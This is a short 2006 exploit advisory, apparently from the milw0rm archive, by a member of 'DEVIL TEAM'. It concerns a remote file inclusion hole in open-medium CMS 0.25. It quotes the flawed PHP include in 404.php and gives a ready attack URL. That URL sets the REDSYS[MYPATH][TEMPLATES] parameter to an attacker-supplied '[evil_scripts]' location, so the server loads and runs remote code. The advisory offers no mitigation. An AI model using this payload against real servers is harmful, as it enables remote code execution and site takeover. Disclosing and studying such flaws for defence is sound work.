32 lines
No EOL
870 B
Text
32 lines
No EOL
870 B
Text
################ DEVIL TEAM THE BEST POLISH TEAM #################
|
|
#open-medium (0.25) - Content Management System - Remote File Include Vulnerabilities
|
|
#Find by Kacper (Rahim).
|
|
#Greetings For ALL DEVIL TEAM members, Special DragonHeart :***
|
|
#Contact: kacper1964@yahoo.pl or http://www.devilteam.yum.pl
|
|
##################################################################
|
|
[code]
|
|
404.php:
|
|
|
|
.......
|
|
|
|
} else {
|
|
// templates verwenden
|
|
if
|
|
(!@include($REDSYS["MYPATH"]["TEMPLATES"]."/redsys".$REDSYS["LanguagePath"]."/404.tmp"))
|
|
{
|
|
include($REDSYS["MYPATH"]["TEMPLATES"]."/redsys/404.tmp");
|
|
}
|
|
}
|
|
|
|
?>
|
|
|
|
[/code]
|
|
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|
|
|
|
http://www.site.com/[open-mediumCMS_path]/redsys/404.php?REDSYS[MYPATH][TEMPLATES]=[evil_scripts]
|
|
|
|
|
|
###################################################################
|
|
#Elo ;-)
|
|
|
|
# milw0rm.com [2006-05-25] |